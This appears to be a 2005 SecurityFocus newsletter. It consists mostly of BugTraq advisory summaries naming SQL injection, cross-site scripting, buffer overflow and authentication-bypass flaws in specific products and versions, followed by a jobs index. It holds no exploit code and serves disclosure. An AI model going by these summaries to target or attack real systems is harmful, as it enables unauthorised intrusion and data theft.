SecurityFocus Newsletter #310
----------------------------------------

This Issue is Sponsored By: CrossTec

NetOp Desktop Firewall & Policy Server lets you centrally manage which
applications can run on your enterprise PCs.  NetOp's tiny driver-centric design
prevents unauthorized programs and processes, including viruses, keyloggers,
spyware and more from executing -- without slowing down your systems. The future
of endpoint protection is available today. Try it FREE.

http://www.securityfocus.com/sponsor/CrossTec_sf-news_050726

------------------------------------------------------------------
I.    FRONT AND CENTER
       1. Greasing the wheel with Greasemonkey
       2. Security still underfunded
       3. Windows Syscall Shellcode
II.   BUGTRAQ SUMMARY
       1. Kayako LiveResponse Multiple Input Validation Vulnerabilities
       2. PluggedOut CMS Multiple Input Validation Vulnerabilities
       3. PC-Experience/Toppe Unauthorized User Access Vulnerability
       4. PC-Experience/Toppe PM.PHP MSG Parameter Cross-Site Scripting
Vulnerability
       5. Ragnarok Online Control Panel Authentication Bypass Vulnerability
       6. NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
       7. Jabber Studio JabberD Multiple Remote Buffer Overflow Vulnerabilities
       8. MySQL Eventum Multiple Cross-Site Scripting Vulnerabilities
       9. MySQL Eventum Multiple SQL Injection Vulnerabilities
       10. ChurchInfo Multiple SQL Injection Vulnerabilities
       11. PHPFreeNews Multiple Cross Site Scripting Vulnerabilities
       12. AderSoftware CFBB Index.CFM Cross-Site Scripting Vulnerability
       13. No-Brainer SMTP Client Log_Msg() Remote Format String Vulnerability
       14. PHPFreeNews Admin Login SQL Injection Vulnerability
       15. OpenBook Admin.PHP SQL Injection Vulnerability
       16. Apple Mac OS X Font Book Font Collection Buffer Overflow
Vulnerability
       17. Trend Micro OfficeScan POP3 Module Shared Section Insecure
Permissions Vulnerability
       18. Shiny Entertainment Sacrifice Remote Arbitrary Code Execution
Vulnerabilities
       19. Info-ZIP UnZip CHMod File Permission Modification Race Condition
Weakness
       20. Pablo Software Solutions Quick 'n Easy FTP Server User Command Denial
of Service Vulnerability
       21. nCipher CHIL Random Cache Leakage Vulnerability
       22. Computer Associates BrightStor ARCserve Backup Remote Buffer Overflow
Vulnerability
       23. Naxtor Shopping Cart Lost_password.PHP Cross Site Scripting
Vulnerability
       24. Metasploit Framework MSFWeb Defanged Mode Restriction Bypass
Vulnerability
       25. Naxtor Shopping Cart Shop_Display_Products.PHP SQL Injection
Vulnerability
       26. Microsoft ActiveSync Network Synchronization Multiple Vulnerabilities
       27. ProRat Server Remote Buffer Overflow Vulnerability
       28. Debian Apt-Cacher Remote Command Execution Vulnerability
       29. Fusebox Index.CFM Cross-Site Scripting Vulnerability
       30. Symantec Norton GoBack Local Authentication Bypass Vulnerability
       31. GXT Editor Buffer Overflow Vulnerability
       32. Karrigell KS File Arbitrary Python Command Execution Vulnerability
       33. Web Content Management Multiple Cross-Site Scripting Vulnerabilities
       34. Web Content Management Administrator Account Unauthorized Access
Vulnerability
       35. Silvernews Admin.PHP SQL Injection Vulnerability
       36. Linux Kernel Stack Fault Exceptions Unspecified Local Denial of
Service Vulnerability
       37. Naxtor E-directory Message.ASP Cross Site Scripting Vulnerability
       38. Naxtor E-directory Default.ASP SQL Injection Vulnerability
       39. Linux Kernel NFSACL Protocol XDR Data Remote Denial of Service
Vulnerability
       40. Denora IRC Stats Remote Buffer Overflow Vulnerability
       41. LogiCampus Helpdesk Unspecified Cross Site Scripting Vulnerability
       42. NetworkActiv Web Server Cross-Site Scripting Vulnerability
       43. PortailPHP Index.PHP SQL Injection Vulnerability
       44. McDATA E/OS Remote Denial Of Service Vulnerability
       45. Microsoft August Advance Notification Unspecified Security
Vulnerabilities
       46. Linux Kernel XFRM Array Index Buffer Overflow Vulnerability
       47. Comdev ECommerce Config.PHP Remote File Include Vulnerability
       48. Comdev eCommerce WCE.Download.PHP Directory Traversal Vulnerability
       49. Microsoft Windows Unspecified Remote Arbitrary Code Execution
Vulnerability
       50. Jax PHP Scripts Multiple Cross-Site Scripting Vulnerabilities
       51. Jax PHP Scripts Multiple Remote Information Disclosure
Vulnerabilities
       52. FlatNuke Multiple Cross Site Scripting Vulnerabilities
       53. PHPOpenChat Multiple HTML Injection Vulnerabilities
       54. FlatNuke User Data Arbitrary PHP Code Execution Vulnerability
       55. Lantronix Secure Console Server SCS820/SCS1620 Multiple Local
Vulnerabilities
       56. EMC Navisphere Manager Directory Traversal And Information Disclosure
Vulnerabilities
       57. Acunetix Web Vulnerability Scanner Remote Denial of Service
Vulnerability
       58. PHP-Fusion Messages.PHP SQL Injection Vulnerability
III.  SECURITYFOCUS NEWS
       1. Microsoft's "monkeys" find first zero-day exploit
       2. Annual hacking game teaches security lessons
       3. Exploit writers team up to target Cisco routers
       4. Reading, rooting, 'rithmetic: Preschoolers learn programming
       5. ID theft automated using keylogger Trojan
       6. Former 'Spam King' pays MS $7m to settle lawsuit
       7. Microsoft quells Vista virus concerns
       8. OS exploits are 'old hat'
IV.   SECURITY JOBS LIST SUMMARY
       1. [SJ-JOB] Account Manager, Reston, VA
       2. [SJ-JOB] Director, Information Security, Portland
       3. [SJ-JOB] Application Security Architect, Amsterdam
       4. [SJ-JOB] Sr. Security Analyst, Fredericton
       5. [SJ-JOB] Forensics Engineer, London
       6. [SJ-JOB] Security Consultant, Bern, Lausanne or Zurich
       7. [SJ-JOB] Security Consultant, Munich or Frankfurt
       8. [SJ-JOB] Compliance Officer, M4 Corridor
       9. [SJ-JOB] Security Consultant, Grapevine
       10. [SJ-JOB] Security Engineer, Milpitas
       11. [SJ-JOB] Application Security Architect, Bern, Lausanne or Zurich
       12. [SJ-JOB] Security Consultant, Bristol
       13. [SJ-JOB] Developer, Boulder
       14. [SJ-JOB] Developer, Boulder
       15. [SJ-JOB] Security System Administrator, Albany
       16. [SJ-JOB] Security System Administrator, Albany
       17. [SJ-JOB] Account Manager, Seattle
       18. [SJ-JOB] Manager, Information Security, Boston
       19. [SJ-JOB] Security Consultant, Maidenhead, Berkshire
       20. [SJ-JOB] Sr. Security Analyst, Buffalo
       21. [SJ-JOB] Chief Security Strategist, Los Angeles
       22. [SJ-JOB] Manager, Information Security, Oklahoma City
       23. [SJ-JOB] Technology Risk Consultant, Chicago
       24. [SJ-JOB] Sr. Security Analyst, Sterling
       25. [SJ-JOB] Manager, Information Security, Buffalo
       26. [SJ-JOB] Forensics Engineer, Countrywide
       27. [SJ-JOB] Security Consultant, New York
       28. [SJ-JOB] Manager, Information Security, Boston
       29. [SJ-JOB] Security Engineer, Boston
       30. [SJ-JOB] Security Engineer, Los Angeles
       31. [SJ-JOB] Security Consultant, Pennsylvania
       32. [SJ-JOB] Security Consultant, New Jersey
       33. [SJ-JOB] Security Consultant, California
       34. [SJ-JOB] Sales Representative, Atlanta
       35. [SJ-JOB] Security Consultant, Connecticut
       36. [SJ-JOB] Sales Engineer, New York
       37. [SJ-JOB] Sales Engineer, El Segundo
       38. [SJ-JOB] Compliance Officer, Warren
       39. [SJ-JOB] Security Engineer, Edison
       40. [SJ-JOB] Evangelist, Dallas
       41. [SJ-JOB] Security Engineer, Chantilly
       42. [SJ-JOB] Security Architect, Santa Ana
       43. [SJ-JOB] Account Manager, California
       44. [SJ-JOB] Security System Administrator, Atlanta
       45. [SJ-JOB] Sales Representative, Dallas
       46. [SJ-JOB] Sales Representative, Atlanta
       47. [SJ-JOB] Technical Support Engineer, Atlanta
       48. [SJ-JOB] Sales Representative, Atlanta
       49. [SJ-JOB] Sales Representative, Atlanta
       50. [SJ-JOB] Developer, Atlanta
       51. [SJ-JOB] Sales Representative, Atlanta
       52. [SJ-JOB] Security System Administrator, Springfield
       53. [SJ-JOB] Application Security Engineer, New York City
       54. [SJ-JOB] Security Researcher, El Segundo
       55. [SJ-JOB] Jr. Security Analyst, Redwood City
       56. [SJ-JOB] Management, Chantilly
       57. [SJ-JOB] Sr. Security Analyst, Atlanta  (downtown)
       58. [SJ-JOB] Security Engineer, Sunnyvale
       59. [SJ-JOB] Sales Engineer, Dallas
       60. [SJ-JOB] Sales Engineer, Washington Metro Area
       61. [SJ-JOB] Compliance Officer, Miami
       62. [SJ-JOB] Security System Administrator, Western Kansas
       63. [SJ-JOB] Security Consultant, New York
       64. [SJ-JOB] Sales Engineer, Singapore
       65. [SJ-JOB] Security Consultant, Cambridge
       66. [SJ-JOB] Security Architect, Portland
       67. [SJ-JOB] Sr. Security Engineer, Islandia
       68. [SJ-JOB] Sr. Security Engineer, Bethesda
       69. [SJ-JOB] Sr. Security Engineer, Austin
       70. [SJ-JOB] Security Researcher, Austin
       71. [SJ-JOB] VP / Dir / Mgr engineering, Washington
       72. [SJ-JOB] Security Consultant, Boisbriand
       73. [SJ-JOB] Sr. Security Analyst, central
       74. [SJ-JOB] VP / Dir / Mgr engineering, Pune
       75. [SJ-JOB] Quality Assurance, Cupertino
       76. [SJ-JOB] Technical Marketing Engineer, Cupertino
       77. [SJ-JOB] Security System Administrator, Appleton
V.    INCIDENTS LIST SUMMARY
VI.   VULN-DEV RESEARCH LIST SUMMARY
VII.  MICROSOFT FOCUS LIST SUMMARY
       1. IEEE 802.1x & EAP-TLS design based on Windows 2000 Server
       2. SecurityFocus Microsoft Newsletter #250
VIII. SUN FOCUS LIST SUMMARY
       1. Securing Solaris 10
       2. Accessing Solaris 10 Local Zones from the Global Zone, security risk
IX.   LINUX FOCUS LIST SUMMARY
X.    BOOK EXCERPTS
XI.   UNSUBSCRIBE INSTRUCTIONS
XII.  SPONSOR INFORMATION

I.   FRONT AND CENTER
---------------------
1. Greasing the wheel with Greasemonkey
By Scott Granneman
If blogging is enjoyable because it allows us to watch an interesting mind at
work, then Jon Udell's blog is definitely among the most enjoyable.
http://www.securityfocus.com/columnists/346

2. Security still underfunded
By Kelly Martin
Blackhat is one of my favorite places to do some casual online banking over an
insecure WiFi connection. Where's the risk, right?
http://www.securityfocus.com/columnists/345

3. Windows Syscall Shellcode
By Piotr Bania
This article has been written to show that it is possible to write shellcode for
Windows operating systems that doesn't use standard API calls at all.
http://www.securityfocus.com/infocus/1844


II.  BUGTRAQ SUMMARY
--------------------
1. Kayako LiveResponse Multiple Input Validation Vulnerabilities
BugTraq ID: 14425
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14425
Summary:
Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection,
and HTML injection vulnerabilities.  These issues are all related to input
validation errors.

The cross-site scripting and HTML injection vulnerabilities may allow for theft
of cookie-based authentication credentials or other attacks.  The SQL injection
vulnerabilities may permit a remote attacker to compromise the software or
launch other attacks against the database.

2. PluggedOut CMS Multiple Input Validation Vulnerabilities
BugTraq ID: 14426
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14426
Summary:
PluggedOut CMS is prone to multiple cross-site scripting and SQL injection
vulnerabilities.

Exploitation could allow for theft of cookie-based authentication credentials or
unauthorized access to database data.  Other attacks are also possible.


3. PC-Experience/Toppe Unauthorized User Access Vulnerability
BugTraq ID: 14427
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14427
Summary:
PC-Experience and Toppe may let remote attackers gain unauthorized access to
arbitrary user accounts.  This is due to an access validation error related to
cookie authentication.

4. PC-Experience/Toppe PM.PHP MSG Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 14428
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14428
Summary:
PC-Experience and Toppe are prone to cross-site scripting attacks.  This may let
a remote attacker gain access to the cookie-based authentication credentials of
other PC-Experience/Toppe users.


5. Ragnarok Online Control Panel Authentication Bypass Vulnerability
BugTraq ID: 14429
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14429
Summary:
Ragnarok Online Control Panel (ROCP) is prone to a vulnerability that may let
remote attackers bypass user authentication.  This issue is related to how PHP
variables are handled, letting an attacker influence a variable that is used to
check user authentication.

Exploitation could yield administrative access to the ROCP site.

This issue may be exclusive to sites hosting ROCP with Apache Web server.  This
has not been confirmed.

6. NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
BugTraq ID: 14434
Remote: Yes
Date Published: 2005-07-31
Relevant URL: http://www.securityfocus.com/bid/14434
Summary:
BusinessMail is affected by multiple remote buffer overflow vulnerabilities.  
These issues arise due to a lack of boundary checks performed by the application
and may allow remote attackers to execute machine code in the context of the
server process. 

BusinessMail 4.60 is reportedly vulnerable.  Other versions may be affected as
well.

7. Jabber Studio JabberD Multiple Remote Buffer Overflow Vulnerabilities
BugTraq ID: 14435
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14435
Summary:
Jabber Studio jabberd is affected by multiple remote buffer overflow
vulnerabilities.

An attacker may leverage these issues to execute arbitrary code on a computer
with the privileges of the server process. This may facilitate unauthorized
access or privilege escalation.

2.0s8 and prior versions of jabberd are affected by these issues.


8. MySQL Eventum Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 14436
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14436
Summary:
MySQL Eventum is prone to multiple cross-site scripting vulnerabilities.  These
issues are due to a failure in the application to properly sanitize
user-supplied input.

An attacker may leverage any of these issues to have arbitrary script code
executed in the browser of an unsuspecting user in the context of the affected
site.  This may facilitate the theft of cookie-based authentication credentials
as well as other attacks.

9. MySQL Eventum Multiple SQL Injection Vulnerabilities
BugTraq ID: 14437
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14437
Summary:
MySQL Eventum is prone to multiple SQL injection vulnerabilities.  These issues
are due to a failure in the application to properly sanitize user-supplied input
before using it in SQL queries.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

10. ChurchInfo Multiple SQL Injection Vulnerabilities
BugTraq ID: 14438
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14438
Summary:
ChurchInfo is prone to multiple SQL injection vulnerabilities.  These issues are
due to a failure in the application to properly sanitize user-supplied input
before using it in SQL queries.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

11. PHPFreeNews Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 14439
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14439
Summary:
PHPFreeNews is prone to multiple cross-site scripting vulnerabilities.  These
issues are due to a failure in the application to properly sanitize
user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.


12. AderSoftware CFBB Index.CFM Cross-Site Scripting Vulnerability
BugTraq ID: 14440
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14440
Summary:
CFBB is prone to a cross-site scripting vulnerability.  This issue is due to a
failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.

This issue affects CFBB version 1.1.0; other versions may also be vulnerable.

13. No-Brainer SMTP Client Log_Msg() Remote Format String Vulnerability
BugTraq ID: 14441
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14441
Summary:
A remote format string vulnerability affects the message logging functionality
of nbSMTP. This issue is due to a failure of the application to properly
sanitize user-supplied input prior to passing it as the format specifier to a
formatted printing function.

A remote attacker may leverage this issue to write to arbitrary process memory,
facilitating code execution.

14. PHPFreeNews Admin Login SQL Injection Vulnerability
BugTraq ID: 14442
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14442
Summary:
PHPFreeNews is prone to an SQL injection vulnerability.  This issue is due to a
failure in the application to properly sanitize user-supplied input before using
it in an SQL query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.


15. OpenBook Admin.PHP SQL Injection Vulnerability
BugTraq ID: 14444
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14444
Summary:
OpenBook is prone to an SQL injection vulnerability.  This issue is due to a
failure in the application to properly sanitize user-supplied input before using
it in an SQL query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.


16. Apple Mac OS X Font Book Font Collection Buffer Overflow Vulnerability
BugTraq ID: 14445
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14445
Summary:
Apple Font Book is prone to a buffer overflow vulnerability. This issue is
exposed when the application handles font collection files. The vulnerability is
due to insufficient bounds checking in user-supplied data contained in font
collection bundles, causing an internal buffer to be overrun and memory
corruption to occur. As these files may originate from an external source, this
issue is considered remotely exploitable.  

The application may be a default handler for these files, making it possible to
exploit this issue through a malicious Web page or other means.

If the vulnerability is successfully exploited, it may result in execution of
arbitrary code in the context of the user running the application.

17. Trend Micro OfficeScan POP3 Module Shared Section Insecure Permissions
Vulnerability
BugTraq ID: 14448
Remote: No
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14448
Summary:
The Trend Micro OfficeScan POP3 module uses Shared Sections in an insecure
manner.

Attackers may read the data stored in the affected memory region, gaining access
to potentially sensitive information. They may also write arbitrary data to the
shared memory segment.

By writing data to this region, they may alter the message that is displayed to
the user when the POP3 module intercepts malware in email. This may be utilized
in social engineering attacks.

This vulnerability may possibly be exploited to crash the OfficeScan service, or
potentially execute arbitrary machine code with System level privileges. This
has not been confirmed.

This vulnerability is reported in version 5.58 of OfficeScan. Other versions may
also be affected.

18. Shiny Entertainment Sacrifice Remote Arbitrary Code Execution
Vulnerabilities
BugTraq ID: 14449
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14449
Summary:
Sacrifice is affected by multiple remote arbitrary code execution
vulnerabilities.  These issues include a remote buffer overflow and a remote
format string vulnerability.

An attacker may leverage these issues to execute arbitrary code in the context
of the application to gain unauthorized access.

Sacrifice patch #3 and prior versions are affected by these issues.

19. Info-ZIP UnZip CHMod File Permission Modification Race Condition Weakness
BugTraq ID: 14450
Remote: No
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14450
Summary:
Info-ZIP unzip is reported prone to a security weakness; the issue is only
present when an archive is extracted into a world or group writable directory.
It is reported that unzip employs non-atomic procedures to write a file and
later change the permissions on the newly extracted file.

A local attacker may leverage this issue to modify file permissions of target
files.


20. Pablo Software Solutions Quick 'n Easy FTP Server User Command Denial of
Service Vulnerability
BugTraq ID: 14451
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14451
Summary:
Quick 'n Easy FTP Server is prone to a remotely exploitable denial of service
vulnerability.  This may be triggered by a client through an overly long
argument for the USER command.

Successful exploitation may lead to a crash due to resource exhaustion.

This issue was originally identified as a buffer overflow vulnerability.  Due to
the availability of more details, it is being changed to a denial of service
vulnerability.

21. nCipher CHIL Random Cache Leakage Vulnerability
BugTraq ID: 14452
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14452
Summary:
The nCipher CHIL library is affected by a random cache leakage vulnerability.

This issue arises when a program attempts to obtain random bytes from an nCipher
hardware module.  If the program calling the library forks, the child processes
will inherit the identical randomness cache as the parent.

The impact of this issue depends on the type of application that forks and uses
CHIL to generate random data.  Denial of service conditions in Web servers due
to the failure of SSL handshakes and other attacks may be possible.

Applications that fork and use CHIL directly or through OpenSSL are vulnerable
to this issue.  OpenSSL 0.9.6-ENGINE and 0.9.7 use CHIL for random number
generation (via RAND_bytes or RAND_pseudo_bytes) if the "chil" engine is
enabled. 

22. Computer Associates BrightStor ARCserve Backup Remote Buffer Overflow
Vulnerability
BugTraq ID: 14453
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14453
Summary:
Computer Associates BrightStor ARCserve Backup and BrightStor Enterprise Backup
Agents for Windows are affected by a remote stack-based buffer overflow
vulnerability.  This issue is due to a failure of the application to perform
proper bounds checking on data supplied to the application.

A remote attacker may exploit this issue to execute arbitrary code on a
vulnerable computer with SYSTEM privileges. A denial of service condition may
arise as well.


23. Naxtor Shopping Cart Lost_password.PHP Cross Site Scripting Vulnerability
BugTraq ID: 14454
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14454
Summary:
Naxtor Shopping Cart is prone to a cross-site scripting vulnerability.  This
issue is due to a failure in the application to properly sanitize user-supplied
input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.


24. Metasploit Framework MSFWeb Defanged Mode Restriction Bypass Vulnerability
BugTraq ID: 14455
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14455
Summary:
Metasploit Framework is susceptible to a restriction bypass vulnerability in
msfweb. This issue is due to a failure of the application to properly implement
access control restrictions.

This issue allows remote attackers to bypass security restrictions in the
affected Web server. Attackers may exploit this issue to attack arbitrary
computers using the Metasploit Framework, while originating the attacks from the
computer hosting the vulnerable msfweb process.

Attackers may also interact with the payload features in the Metasploit
Framework to manipulate files on the hosting computer, likely leading to
executing arbitrary commands and then complete system compromise.

It should be noted that the Metasploit Framework documentation specifies that
msfweb should not be globally accessible, due to potential security problems.

25. Naxtor Shopping Cart Shop_Display_Products.PHP SQL Injection Vulnerability
BugTraq ID: 14456
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14456
Summary:
Naxtor Shopping Cart is prone to an SQL injection vulnerability.  This issue is
due to a failure in the application to properly sanitize user-supplied input
before using it in an SQL query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

26. Microsoft ActiveSync Network Synchronization Multiple Vulnerabilities
BugTraq ID: 14457
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14457
Summary:
Several specific issues have been identified with the network synchronization
protocol used by Microsoft ActiveSync.

The first issue is the use of cleartext communications for all network traffic. 

The second issue is the lack of password authentication.

The third issue is an information disclosure issue when attempting to initiate
network synchronization.

The last issue is a denial of service vulnerability.

These issues combine to allow remote attackers to gain access to potentially
sensitive information, aiding them in further attacks. Attackers may also alter
or destroy data by simulating the synchronization protocol, or crash the
ActiveSync service.

27. ProRat Server Remote Buffer Overflow Vulnerability
BugTraq ID: 14458
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14458
Summary:
ProRat Server is affected by a remote buffer overflow vulnerability.

A successful attack can result in overflowing a finite sized buffer and
ultimately leading to arbitrary code execution in the context of the affected
process.  This may allow the attacker to gain elevated privileges.

28. Debian Apt-Cacher Remote Command Execution Vulnerability
BugTraq ID: 14459
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14459
Summary:
apt-cacher is prone to a remote command execution vulnerability.

Specifically, the vulnerability can allow remote attackers to execute arbitrary
commands on a computer that is acting as a caching host with the privileges of
'www-data'.

This may allow an attacker to gain unauthorized access to a vulnerable computer.

29. Fusebox Index.CFM Cross-Site Scripting Vulnerability
BugTraq ID: 14460
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14460
Summary:
Fusebox is prone to a cross-site scripting vulnerability.  This issue is due to
a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.

This issue reportedly affects Fusebox version 4.1.0; other versions may also be
vulnerable.

This issue is not believed to exist, because the product does not ship with
layout configuration files; Symantec has not confirmed this.

30. Symantec Norton GoBack Local Authentication Bypass Vulnerability
BugTraq ID: 14461
Remote: No
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14461
Summary:
Norton GoBack is prone to a local authentication bypass vulnerability.

A successful attack causes the application to accept an arbitrary password value
and allow an attacker to make various configuration changes.  Other attacks may
be possible as well.

Symantec is currently investigating this issue.  This BID will be updated when
further analysis is complete.

31. GXT Editor Buffer Overflow Vulnerability
BugTraq ID: 14462
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14462
Summary:
GXT Editor is affected by a buffer overflow vulnerability.  This issue is due to
a failure in the application to perform proper bounds checking on user-supplied
data.

A successful attack can result in overflowing a finite sized buffer and
ultimately leading to arbitrary code execution in the context of the affected
application.

32. Karrigell KS File Arbitrary Python Command Execution Vulnerability
BugTraq ID: 14463
Remote: Yes
Date Published: 2005-07-31
Relevant URL: http://www.securityfocus.com/bid/14463
Summary:
Karrigell is susceptible to an arbitrary Python command execution vulnerability.
This issue is due to a design flaw that allows remote attackers to execute
Python commands that they are not intended to have access to.

Attackers may exploit this vulnerability to execute arbitrary Python commands in
the context of the Web server hosting the Karrigell framework. This allows
remote malicious users to cause denial of service conditions, create or
overwrite arbitrary files, and likely compromise the hosting computer.

33. Web Content Management Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 14464
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14464
Summary:
Web content management is prone to multiple cross-site scripting
vulnerabilities.  These issues are due to a failure in the application to
properly sanitize user-supplied input.

An attacker may leverage any of these issues to have arbitrary script code
executed in the browser of an unsuspecting user in the context of the affected
site.  This may facilitate the theft of cookie-based authentication credentials
as well as other attacks.

34. Web Content Management Administrator Account Unauthorized Access
Vulnerability
BugTraq ID: 14465
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14465
Summary:
Web Content Management is prone to an unauthorized access vulnerability.  This
issue is due to a failure in the application to ensure proper access to
administrative functions.

An attacker can exploit this vulnerability to access the vulnerable application
with full administrative privileges.  This may also aid in further attacks
against the underlying system; other attacks are also possible.

35. Silvernews Admin.PHP SQL Injection Vulnerability
BugTraq ID: 14466
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14466
Summary:
Silvernews is prone to an SQL injection vulnerability. This issue is due to
insufficient sanitization of user input.

An attacker may compromise the application by using SQL injection techniques
to bypass the admin login process.

36. Linux Kernel Stack Fault Exceptions Unspecified Local Denial of Service
Vulnerability
BugTraq ID: 14467
Remote: No
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14467
Summary:
Linux kernel is reported prone to an unspecified local denial of service
vulnerability.

It was reported that this issue arises when a local user triggers stack fault
exceptions. A local attacker may exploit this issue to carry out a denial of
service attack against a vulnerable computer by crashing the kernel.


37. Naxtor E-directory Message.ASP Cross Site Scripting Vulnerability
BugTraq ID: 14468
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14468
Summary:
Naxtor E-directory is prone to a cross-site scripting vulnerability.

This issue is due to a failure in the application to properly sanitize
user-supplied input. 

An attacker can exploit this vulnerability to inject HTML and script code into
the Web browser of an unsuspecting victim. The attacker may then steal
cookie-based authentication credentials. Other attacks are also possible.


38. Naxtor E-directory Default.ASP SQL Injection Vulnerability
BugTraq ID: 14469
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14469
Summary:
Naxtor E-directory is prone to an SQL injection vulnerability. This issue is due
to a failure in the application to properly sanitize user-supplied input before
using it in SQL queries.

Successful exploitation results in gaining full administrative access within the
context of the affected application.

39. Linux Kernel NFSACL Protocol XDR Data Remote Denial of Service Vulnerability
BugTraq ID: 14470
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14470
Summary:
Linux Kernel is affected by a remote denial of service vulnerability when
handling XDR data for the nfsacl protocol.

Specific details about this issue were not disclosed.  It is conjectured that an
attacker could craft malformed XDR data containing large string values to
corrupt kernel memory.

This may result in a denial of service condition.

40. Denora IRC Stats Remote Buffer Overflow Vulnerability
BugTraq ID: 14471
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14471
Summary:
Denora IRC Stats is affected by a remote buffer overflow vulnerability.

A successful attack can result in memory corruption and allow an attacker to
execute arbitrary code in the context of the application.  This may lead to
unauthorized access.

Denora IRC Stats versions prior to 1.1.0 are vulnerable to this issue.

41. LogiCampus Helpdesk Unspecified Cross Site Scripting Vulnerability
BugTraq ID: 14472
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14472
Summary:
LogiCampus is prone to a cross-site scripting vulnerability. This issue is due
to a failure in the application to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability to inject HTML and script code into
the Web browser of an unsuspecting victim.  The attacker may then steal
cookie-based authentication credentials; other attacks are also possible.


42. NetworkActiv Web Server Cross-Site Scripting Vulnerability
BugTraq ID: 14473
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14473
Summary:
NetworkActiv Web Server is prone to a cross-site scripting vulnerability.  This
issue is due to a failure in the application to properly sanitize user-supplied
input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.

43. PortailPHP Index.PHP SQL Injection Vulnerability
BugTraq ID: 14474
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14474
Summary:
Portail PHP is prone to an SQL injection vulnerability. This issue is due to a
failure in the application to properly sanitize user-supplied input before using
it in SQL queries.

The consequences of this attack may vary depending on the type of queries that
can be influenced, and the implementation of the database. 

This issue is reported to affect Portail PHP version 2.4; conflicting reports
indicate that this information may be inaccurate.

